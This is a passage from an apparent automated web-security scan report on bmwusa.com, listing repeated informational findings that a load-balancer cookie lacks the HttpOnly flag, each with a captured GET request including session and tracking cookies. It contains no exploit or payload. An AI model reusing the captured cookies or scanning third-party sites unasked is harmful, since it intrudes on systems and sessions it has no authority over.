Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:38 GMT;path=/
Content-Length: 215063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.236. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:12 GMT;path=/
Content-Length: 226227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.237. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:45 GMT;path=/
Content-Length: 216433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.238. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:54 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3convertibleexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:54 GMT;path=/
Content-Length: 180296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.239. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3coupeexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:21 GMT;path=/
Content-Length: 180154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.240. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3sedanexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/3sedanexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:41 GMT;path=/
Content-Length: 179241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.241. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:40 GMT;path=/
Content-Length: 210063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.242. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:02:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:02:35 GMT;path=/
Content-Length: 201964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.243. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:00:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:40:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:00:40 GMT;path=/
Content-Length: 202153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.244. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:51 GMT;path=/
Content-Length: 213820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.245. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:15 GMT;path=/
Content-Length: 213821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.246. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:31 GMT;path=/
Content-Length: 227489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.247. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:07 GMT;path=/
Content-Length: 227490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.248. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:54 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
